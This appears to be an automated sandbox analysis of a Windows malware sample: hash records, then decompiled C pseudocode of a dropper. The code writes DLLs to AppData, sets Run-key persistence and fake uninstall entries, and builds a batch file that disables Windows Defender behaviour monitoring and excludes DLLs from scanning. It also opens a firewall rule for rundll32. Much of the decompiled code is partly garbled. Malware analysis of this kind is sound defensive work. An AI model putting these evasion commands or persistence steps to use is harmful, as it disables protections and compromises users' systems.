                                                                • Instruction ID: d0e17038d4a46cb2f4bb6b19fdf6c9db5a03db2108724b6d1f9bfa7df9856f0d
                                                                • Opcode Fuzzy Hash: 478bebfedc8a167ca8aecff9820e8784a461268d8adf5aefe178a479949ec8cf
                                                                • Instruction Fuzzy Hash: B9F0B420B28D4C0FDBD5EF6E545977837C2EB8D222B08807AE84EC3282DD18ED456301
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17085baa8a0549b5ef33f597b748003d5504d48707f76d316b1c07c776ec15ab
                                                                • Instruction ID: 25cd3ac29d1cbca1d1c97432e9662949e440d3626761ed48194d635be0497f45
                                                                • Opcode Fuzzy Hash: 17085baa8a0549b5ef33f597b748003d5504d48707f76d316b1c07c776ec15ab
                                                                • Instruction Fuzzy Hash: 08F08C81A4E7C90FD707577448AA5607FE19FAF01134E50F7D889CF2A3DC090D499362
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e41f8362acba743ded97d1fdaf4f0c2edfe605b8eda309cda1ec8420bdade0ba
                                                                • Instruction ID: ff7dcb6afa54e1c1cd9d86c6ead584e331fdf9f387d2889e431259dbce4f21fd
                                                                • Opcode Fuzzy Hash: e41f8362acba743ded97d1fdaf4f0c2edfe605b8eda309cda1ec8420bdade0ba
                                                                • Instruction Fuzzy Hash: D8F0F661E0FA4F4FEB979F68C4545753780FF06246F14507BE44DC7092DE06E804A692
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 242a4b7ceea92f7747ac5e95de08e612e7f4f69c211a4febbb6c6a40fef2dcfc
                                                                • Instruction ID: d19c794e51cd6729c17e7c4ba23df5e3f5032d7be4580325b8aa067c3ca288df
                                                                • Opcode Fuzzy Hash: 242a4b7ceea92f7747ac5e95de08e612e7f4f69c211a4febbb6c6a40fef2dcfc
                                                                • Instruction Fuzzy Hash: 99E06D20B1891D0FDB55FB6C98917A8B3C3EBC8711B5480B2E50EC7286DE2998425782
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 884317148644b3ddbcfcfc992c7174a4d9a517ff5affea2135706a2a2e516de4
                                                                • Instruction ID: f26901b11572ae05edc146006d7cc37a855d7b6644c5f7e3d93aac8a2787c4d4
                                                                • Opcode Fuzzy Hash: 884317148644b3ddbcfcfc992c7174a4d9a517ff5affea2135706a2a2e516de4
                                                                • Instruction Fuzzy Hash: 5CF0E5A1C8D7CD4FDB035B2448922F93B60EF1B206F4440B3E84CCA083DD1A5214A382
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e516976bc610c946ba3f07c5ad5942403cd19fd0d9cffeae170c0e3694ec33c
                                                                • Instruction ID: f4655a4dc906ac8cc7aecb762f4a2cc9447f92ddf572dc24f16798fb8d675b48
                                                                • Opcode Fuzzy Hash: 2e516976bc610c946ba3f07c5ad5942403cd19fd0d9cffeae170c0e3694ec33c
                                                                • Instruction Fuzzy Hash: 2DE068A990EA8D0FEF82EF48DC008657754FB0621EF0202FAE84CC3042DA269C098382
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6772c103b912c560282c66a90bb46e54278062bde3218817fc5dd30af2eb70c1
                                                                • Instruction ID: afd0493d113d5b36e8557094534c55c8e6f85effef2d3f18a7e3ecf5026869a5
                                                                • Opcode Fuzzy Hash: 6772c103b912c560282c66a90bb46e54278062bde3218817fc5dd30af2eb70c1
                                                                • Instruction Fuzzy Hash: 73E0C200B18E090FDBD4AB2C88D973523C2EBAE145F00D575A00EC339ADD14D8064300
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 866128c4c5ebe6efeb7a808cb419ce423292e24fc7cf6a0cf8130ddc74b8be73
                                                                • Instruction ID: 010954ad151ccb11a0ba18f8889b4fcbea23c5b22eab56febe4cf3257df3245f
                                                                • Opcode Fuzzy Hash: 866128c4c5ebe6efeb7a808cb419ce423292e24fc7cf6a0cf8130ddc74b8be73
                                                                • Instruction Fuzzy Hash: 1EE0923092868E9BEF029F35C8053BA3BD0BF05304F44C4A6F84DCA081DE38E244D693
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e229871ad1bf86b9bb664c628d116314aa15d83dcf8663dbf58f362966acbcc2
                                                                • Instruction ID: 02b06ef68deed090f64f325c43ae4ff1f2857b41bcbad964de29bfbf01ccebb0
                                                                • Opcode Fuzzy Hash: e229871ad1bf86b9bb664c628d116314aa15d83dcf8663dbf58f362966acbcc2
                                                                • Instruction Fuzzy Hash: 57D01261E0DB8A8FFB929FA9845913C3DD0BF1A205F441077D50DC7152DE699C059706
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Executed Functions

                                                                C-Code - Quality: 81%
                                                                			E00401B70() {
                                                                				void* _t42;
                                                                				char* _t44;
                                                                				struct HINSTANCE__* _t58;
                                                                				int _t61;
                                                                				void* _t97;
                                                                				int _t112;
                                                                				intOrPtr* _t119;
                                                                				void* _t120;
                                                                				signed char _t123;
                                                                				void* _t143;
                                                                				signed char _t144;
                                                                				char* _t145;
                                                                				void* _t162;
                                                                				signed char _t174;
                                                                				signed int _t177;
                                                                				void* _t178;
                                                                				void* _t185;
                                                                				void* _t210;
                                                                				char* _t212;
                                                                
                                                                				_t44 = _t42 + 1 - 0xe5bf5a71;
                                                                				 *((char*)(_t44 + 0x1b)) = 0x4e;
                                                                				 *_t44 =  *_t44 + 1;
                                                                				 *((char*)(_t44 + 1)) =  *((char*)(_t44 + 1)) - 1;
                                                                				_t145 = _t44;
                                                                				 *((char*)(_t145 + 0xd)) =  *((char*)(_t145 + 0xd)) - 1;
                                                                				 *((char*)(_t145 + 0xe)) =  *((char*)(_t145 + 0xe)) - 1;
                                                                				 *((char*)(_t145 + 0x21)) =  *((char*)(_t145 + 0x21)) + 1;
                                                                				 *((char*)(_t145 + 0x25)) =  *((char*)(_t145 + 0x25)) - 1;
                                                                				 *((char*)(_t145 + 0x14)) =  *((char*)(_t145 + 0x14)) - 1;
                                                                				 *((char*)(_t145 + 0x13)) =  *((char*)(_t145 + 0x13)) - 1;
                                                                				 *((intOrPtr*)(_t44 + 0x2d)) =  *((intOrPtr*)(_t44 + 0x2d)) - 0x7950f117;
                                                                				 *((intOrPtr*)(_t44 + 0x2d)) =  *((intOrPtr*)(_t44 + 0x2d)) - 3;
                                                                				E004028D0(_t143, _t145);
                                                                				 *0x4433c3(0, 0x1a, 0, 0, "C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91"); // executed
                                                                				lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91", "\\IDFcan");
                                                                				CreateDirectoryA("C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91", 0); // executed
                                                                				asm("repne scasb");
                                                                				memcpy(0x443411, "\\jdfddn.dll", 0xd);
                                                                				_t185 = _t178;
                                                                				_push(_t185);
                                                                				asm("repne scasb");
                                                                				_push(0);
                                                                				asm("pushad");
                                                                				lstrcpyA("C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll", "C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91");
                                                                				asm("popad");
                                                                				memcpy("ft\\Windows\\CurrentVersion\\Run", 0x43cdef, 0x10);
                                                                				asm("pushad");
                                                                				_t58 = GetModuleHandleA("kernel32");
                                                                				if(_t58 == 0) {
                                                                					L56:
                                                                					Sleep(0x1388); // executed
                                                                					GetTempPathA(0x1f4, "C:\Users\jones\AppData\Local\Temp\oh161a161.bat");
                                                                					lstrcatA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat", "oh161a161.bat");
                                                                					_t61 = DeleteFileA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat"); // executed
                                                                					asm("popad");
                                                                					CloseHandle(E004024B7(_t61));
                                                                					 *((intOrPtr*)(0x1a + "ft\\Windows\\CurrentVersion\\Run")) = 0xc7bed139;
                                                                					 *((intOrPtr*)(0x1a + "ft\\Windows\\CurrentVersion\\Run")) =  *((intOrPtr*)(0x1a + "ft\\Windows\\CurrentVersion\\Run")) + 0x38afa419;
                                                                					 *0x443404 = 0x646e7572;
                                                                					 *0x443408 = 0x32336c6c;
                                                                					 *0x44340c = 0x6578652e;
                                                                					 *0x443410 = 0x2220;
                                                                					asm("repne scasb");
                                                                					_push(0x443404);
                                                                					 *0x00443403 = 0x21;
                                                                					 *((char*)(0x443403)) =  *((char*)(0x443403)) + 1;
                                                                					 *0x443404 = 0xfffffffffffffffd;
                                                                					_t210 = "jdfddn";
                                                                					memcpy(0x443405, _t210, 6);
                                                                					asm("stosb");
                                                                					if( *0x43f5a1 == 0) {
                                                                						lstrcpyA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", "C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91");
                                                                						_t112 = lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe");
                                                                						asm("std");
                                                                						asm("repne scasb");
                                                                						 *((char*)(0x444bb4 + _t112 + 1)) = 0;
                                                                						asm("cld");
                                                                						 *0x446364 = 0x22;
                                                                						lstrcpyA("C:\Users\jones\AppData\Roaming\IDFcan\miakhad.dll",xpi", "C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe");
                                                                						lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\miakhad.dll",xpi", "\\miakhad.dll");
                                                                						lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", "\\2707952b-6f11-481e-99be-b28317af8e3d.exe");
                                                                						lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe");
                                                                					}
                                                                					lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\miakhad.dll",xpi", "\",xpi");
                                                                					GetModuleFileNameA(0, 0x447f63, 0x258);
                                                                					Sleep(0xbb8); // executed
                                                                					if( *0x43f5c2 == 0) {
                                                                						Sleep(0x9c4);
                                                                					}
                                                                					if( *0x43f5c2 == 0) {
                                                                						Sleep(0x9c4);
                                                                					}
                                                                					if( *0x43f5c2 == 0) {
                                                                						Sleep(0x9c4);
                                                                					}
                                                                					if( *0x43f5c2 == 0) {
                                                                						Sleep(0x9c4);
                                                                					}
                                                                					if( *0x43f5c2 == 0) {
                                                                						Sleep(0x9c4);
                                                                					}
                                                                					if( *0x43f5c2 == 0) {
                                                                						Sleep(0x157c);
                                                                					}
                                                                					lstrcpyA(0x447793, ""C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91");
                                                                					 *0x447f62 = 0x20;
                                                                					lstrcatA(0x447793, 0x447f62);
                                                                					0x44722b->cbSize = 0x3c;
                                                                					 *0x0044722F = 0x40;
                                                                					 *0x443410 = 0;
                                                                					 *0x43f5e3 = 0x6e65706f;
                                                                					 *0x43f5e7 = 0;
                                                                					 *0x00447237 = 0x43f5e3;
                                                                					 *0x0044723B = 0x443404;
                                                                					 *0x0044723F = 0x447793;
                                                                					ShellExecuteExA(0x44722b); // executed
                                                                					 *0x443410 = 0x20;
                                                                					while( *0x43f5c2 == 0) {
                                                                						Sleep(0x3e8);
                                                                					}
                                                                					L74:
                                                                					while(1) {
                                                                						if(OpenMutexA(0x100000, 0,  &M0043E104) == 0) {
                                                                							L81:
                                                                							Sleep(0x1f4); // executed
                                                                							continue;
                                                                						}
                                                                						if( *0x440250 == 4) {
                                                                							RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\2707952b-6f11-481e-99be-b28317af8e3d", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400);
                                                                							E0040247D("DisplayName", 1, "2707952b-6f11-481e-99be-b28317af8e3d", lstrlenA("2707952b-6f11-481e-99be-b28317af8e3d"));
                                                                							E0040247D("UninstallString", 1, "C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe"));
                                                                							E0040247D("Publisher", 1, "South Editor Ltd.", lstrlenA("South Editor Ltd."));
                                                                							RegCloseKey( *0x4433fc);
                                                                						}
                                                                						RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{4864a531-7c66-4f8b-8bca-339fdcb93393}", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400); // executed
                                                                						E0040247D("DisplayName", 1, "{4864a531-7c66-4f8b-8bca-339fdcb93393}", lstrlenA("{4864a531-7c66-4f8b-8bca-339fdcb93393}")); // executed
                                                                						E0040247D("UninstallString", 1, "C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe")); // executed
                                                                						E0040247D("Publisher", 1, "South Editor Ltd.", lstrlenA("South Editor Ltd.")); // executed
                                                                						RegCloseKey( *0x4433fc);
                                                                						RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{de2c9435-807b-4ef9-84e9-24af9a832065}", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400); // executed
                                                                						RegCloseKey( *0x4433fc);
                                                                						GetTickCount();
                                                                						_t174 =  *0x449abb;
                                                                						E00402AD2();
                                                                						lstrcatA("rundll32.exe", " 6i/91");
                                                                						_t97 = E0040247D( &M0043FA86, 1, "rundll32.exe", lstrlenA("rundll32.exe")); // executed
                                                                						if(_t97 != 0) {
                                                                							 *0x43f5a1 = 1;
                                                                						}
                                                                						RegCloseKey( *0x4433fc);
                                                                						if( *0x43f5a1 != 1) {
                                                                							GetModuleFileNameA(0, 0x44039c, 0x258);
                                                                							 *0x443410 = 0;
                                                                							 *0x00447277 = 0x44039c;
                                                                							 *((intOrPtr*)(0x44727b)) = "setupqqadvfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"";
                                                                							ExitProcess(); // executed
                                                                							CreateFileA(0x447267, 0xc0000000, 3, 0, 0x447793, 0x80, 0); // executed
                                                                							goto __edx;
                                                                						} else {
                                                                							ExitProcess();
                                                                							 *_t210 =  *_t210 & _t174;
                                                                							asm("punpckhbw mm6, mm4");
                                                                							goto L81;
                                                                						}
                                                                					}
                                                                				} else {
                                                                					_t119 = GetProcAddress(_t58, "IsWow64Process");
                                                                					if(_t119 == 0 || _t119 == 0xffffffff) {
                                                                						goto L56;
                                                                					} else {
                                                                						_t120 = GetCurrentProcess();
                                                                						 *_t119(_t120, 0x440254);
                                                                						if(( *0x440254 & 0x000000ff) != 1) {
                                                                							goto L56;
                                                                						} else {
                                                                							_t123 = GetTempPathA(0x1f4, "C:\Users\jones\AppData\Local\Temp\oh161a161.bat");
                                                                							_t212 = 0x44021e;
                                                                							_t162 = 9;
                                                                							goto L7;
                                                                							L53:
                                                                							 *_t212 = _t144;
                                                                							_t212 = _t212 + 1;
                                                                							asm("stosb");
                                                                							_t162 = _t162 - 1;
                                                                							if(_t162 != 0) {
                                                                								L7:
                                                                								asm("rdtsc");
                                                                								_t177 = _t123 & 0x000000ff;
                                                                								if(_t177 <= 0 || _t177 >= 0x10) {
                                                                									if(_t177 <= 0xf || _t177 >= 0x20) {
                                                                										if(_t177 <= 0x1f || _t177 >= 0x30) {
                                                                											if(_t177 <= 0x2f || _t177 >= 0x40) {
                                                                												if(_t177 <= 0x3f || _t177 >= 0x50) {
                                                                													if(_t177 <= 0x4f || _t177 >= 0x60) {
                                                                														if(_t177 <= 0x5f || _t177 >= 0x70) {
                                                                															if(_t177 <= 0x6f || _t177 >= 0x80) {
                                                                																if(_t177 <= 0x7f || _t177 >= 0x90) {
                                                                																	if(_t177 <= 0x8f || _t177 >= 0xa0) {
                                                                																		if(_t177 <= 0x9f || _t177 >= 0xb0) {
                                                                																			if(_t177 <= 0xaf || _t177 >= 0xc0) {
                                                                																				if(_t177 <= 0xbf || _t177 >= 0xd0) {
                                                                																					if(_t177 <= 0xcf || _t177 >= 0xe0) {
                                                                																						if(_t177 <= 0xdf || _t177 >= 0xf0) {
                                                                																							_t123 = 0x72;
                                                                																							_t144 = 0x31;
                                                                																						} else {
                                                                																							_t123 = 0x70;
                                                                																							_t144 = 0x63;
                                                                																						}
                                                                																					} else {
                                                                																						_t123 = 0x69;
                                                                																						_t144 = 0x6c;
                                                                																					}
                                                                																				} else {
                                                                																					_t123 = 0x61;
                                                                																					_t144 = 0x77;
                                                                																				}
                                                                																			} else {
                                                                																				_t123 = 0x65;
                                                                																				_t144 = 0x61;
                                                                																			}
                                                                																		} else {
                                                                																			_t123 = 0x73;
                                                                																			_t144 = 0x68;
                                                                																		}
                                                                																	} else {
                                                                																		_t123 = 0x66;
                                                                																		_t144 = 0x6a;
                                                                																	}
                                                                																} else {
                                                                																	_t123 = 0x39;
                                                                																	_t144 = 0x74;
                                                                																}
                                                                															} else {
                                                                																_t123 = 0x38;
                                                                																_t144 = 0x31;
                                                                															}
                                                                														} else {
                                                                															_t123 = 0x37;
                                                                															_t144 = 0x6f;
                                                                														}
                                                                													} else {
                                                                														_t123 = 0x36;
                                                                														_t144 = 0x72;
                                                                													}
                                                                												} else {
                                                                													_t123 = 0x35;
                                                                													_t144 = 0x67;
                                                                												}
                                                                											} else {
                                                                												_t123 = 0x34;
                                                                												_t144 = 0x36;
                                                                											}
                                                                										} else {
                                                                											_t123 = 0x33;
                                                                											_t144 = 0x34;
                                                                										}
                                                                									} else {
                                                                										_t123 = 0x32;
                                                                										_t144 = 0x33;
                                                                									}
                                                                								} else {
                                                                									_t123 = 0x31;
                                                                									_t144 = 0x32;
                                                                								}
                                                                								goto L53;
                                                                							} else {
                                                                								lstrcatA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat", "7sr48er48");
                                                                								lstrcatA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat", ".bat");
                                                                								lstrcatA("oh161a161.bat", ".bat");
                                                                								lstrcpyA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "echo timeout 3 > ");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\necho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\necho exit >> ");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\nstart /min ");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\n");
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "C:\Users\jones\AppData\Local\Temp\oh161a161.bat");
                                                                								 *0x43f703 = 0;
                                                                								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\"\r\n");
                                                                								if(0 != 0) {
                                                                									_push(0);
                                                                									_push(lstrlenA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te"));
                                                                									_push("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te");
                                                                									L0043C844();
                                                                									CloseHandle(0);
                                                                									0x44722b->cbSize = 0x3c;
                                                                									 *((intOrPtr*)(0x44722f)) = 0x40;
                                                                									 *0x43f5e3 = 0x6e65706f;
                                                                									 *0x43f5e7 = 0;
                                                                									 *((intOrPtr*)(0x447237)) = 0x43f5e3;
                                                                									 *((intOrPtr*)(0x44723b)) = 0x43fc10;
                                                                									 *0x0044723F = 0;
                                                                									 *0x00447247 = 0;
                                                                									ShellExecuteExA(0x44722b);
                                                                								}
                                                                								goto L56;
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                			}
                                                                0x00401ffd
                                                                0x00402007
                                                                0x00402011
                                                                0x0040201b
                                                                0x00402032
                                                                0x00402035
                                                                0x00402036
                                                                0x0040203a
                                                                0x00402043
                                                                0x0040204d
                                                                0x00402059
                                                                0x0040205b
                                                                0x0040206c
                                                                0x00402078
                                                                0x00402082
                                                                0x0040208e
                                                                0x00402099
                                                                0x0040209b
                                                                0x0040209f
                                                                0x004020a0
                                                                0x004020b1
                                                                0x004020c0
                                                                0x004020cf
                                                                0x004020d9
                                                                0x004020d9
                                                                0x004020e8
                                                                0x004020fb
                                                                0x00402106
                                                                0x00402112
                                                                0x00402119
                                                                0x00402119
                                                                0x00402125
                                                                0x0040212c
                                                                0x0040212c
                                                                0x00402138
                                                                0x0040213f
                                                                0x0040213f
                                                                0x0040214b
                                                                0x00402152
                                                                0x00402152
                                                                0x0040215e
                                                                0x00402165
                                                                0x00402165
                                                                0x00402171
                                                                0x00402178
                                                                0x00402178
                                                                0x00402189
                                                                0x0040218e
                                                                0x004021a3
                                                                0x004021ae
                                                                0x004021b4
                                                                0x004021bb
                                                                0x004021c2
                                                                0x004021cc
                                                                0x004021d3
                                                                0x004021da
                                                                0x004021e1
                                                                0x004021ef
                                                                0x004021f4
                                                                0x00402207
                                                                0x00402202
                                                                0x00402202
                                                                0x00000000
                                                                0x00402212
                                                                0x00402226
                                                                0x004023e5
                                                                0x004023ea
                                                                0x00000000
                                                                0x004023ea
                                                                0x00402233
                                                                0x0040225a
                                                                0x00402276
                                                                0x00402292
                                                                0x004022ae
                                                                0x004022b9
                                                                0x004022b9
                                                                0x004022df
                                                                0x004022fb
                                                                0x00402317
                                                                0x00402333
                                                                0x0040233e
                                                                0x00402364
                                                                0x0040236f
                                                                0x00402374
                                                                0x00402379
                                                                0x00402386
                                                                0x00402396
                                                                0x004023b2
                                                                0x004023b9
                                                                0x004023bb
                                                                0x004023bb
                                                                0x004023c8
                                                                0x004023d5
                                                                0x00402407
                                                                0x0040240c
                                                                0x00402419
                                                                0x00402420
                                                                0x00402449
                                                                0x00402460
                                                                0x00402468
                                                                0x004023d7
                                                                0x004023d7
                                                                0x004023dc
                                                                0x004023e4
                                                                0x00000000
                                                                0x004023e4
                                                                0x004023d5
                                                                0x00401cb1
                                                                0x00401cbc
                                                                0x00401cbe
                                                                0x00000000
                                                                0x00401ccd
                                                                0x00401ccf
                                                                0x00401cda
                                                                0x00401ce6
                                                                0x00000000
                                                                0x00401cec
                                                                0x00401cfd
                                                                0x00401d07
                                                                0x00401d0c
                                                                0x00401d0c
                                                                0x00401e4f
                                                                0x00401e4f
                                                                0x00401e51
                                                                0x00401e52
                                                                0x00401e53
                                                                0x00401e54
                                                                0x00401d11
                                                                0x00401d11
                                                                0x00401d13
                                                                0x00401d19
                                                                0x00401d2c
                                                                0x00401d3f
                                                                0x00401d52
                                                                0x00401d65
                                                                0x00401d78
                                                                0x00401d8b
                                                                0x00401d9e
                                                                0x00401db4
                                                                0x00401dcd
                                                                0x00401de3
                                                                0x00401df9
                                                                0x00401e0f
                                                                0x00401e25
                                                                0x00401e3b
                                                                0x00401e4b
                                                                0x00401e4d
                                                                0x00401e45
                                                                0x00401e45
                                                                0x00401e47
                                                                0x00401e47
                                                                0x00401e2f
                                                                0x00401e2f
                                                                0x00401e31
                                                                0x00401e31
                                                                0x00401e19
                                                                0x00401e19
                                                                0x00401e1b
                                                                0x00401e1b
                                                                0x00401e03
                                                                0x00401e03
                                                                0x00401e05
                                                                0x00401e05
                                                                0x00401ded
                                                                0x00401ded
                                                                0x00401def
                                                                0x00401def
                                                                0x00401dd7
                                                                0x00401dd7
                                                                0x00401dd9
                                                                0x00401dd9
                                                                0x00401dbe
                                                                0x00401dbe
                                                                0x00401dc0
                                                                0x00401dc0
                                                                0x00401da8
                                                                0x00401da8
                                                                0x00401daa
                                                                0x00401daa
                                                                0x00401d92
                                                                0x00401d92
                                                                0x00401d94
                                                                0x00401d94
                                                                0x00401d7f
                                                                0x00401d7f
                                                                0x00401d81
                                                                0x00401d81
                                                                0x00401d6c
                                                                0x00401d6c
                                                                0x00401d6e
                                                                0x00401d6e
                                                                0x00401d59
                                                                0x00401d59
                                                                0x00401d5b
                                                                0x00401d5b
                                                                0x00401d46
                                                                0x00401d46
                                                                0x00401d48
                                                                0x00401d48
                                                                0x00401d33
                                                                0x00401d33
                                                                0x00401d35
                                                                0x00401d35
                                                                0x00401d20
                                                                0x00401d20
                                                                0x00401d22
                                                                0x00401d22
                                                                0x00000000
                                                                0x00401e5a
                                                                0x00401e64
                                                                0x00401e73
                                                                0x00401e82
                                                                0x00401e91
                                                                0x00401ea0
                                                                0x00401eaf
                                                                0x00401ebe
                                                                0x00401ecd
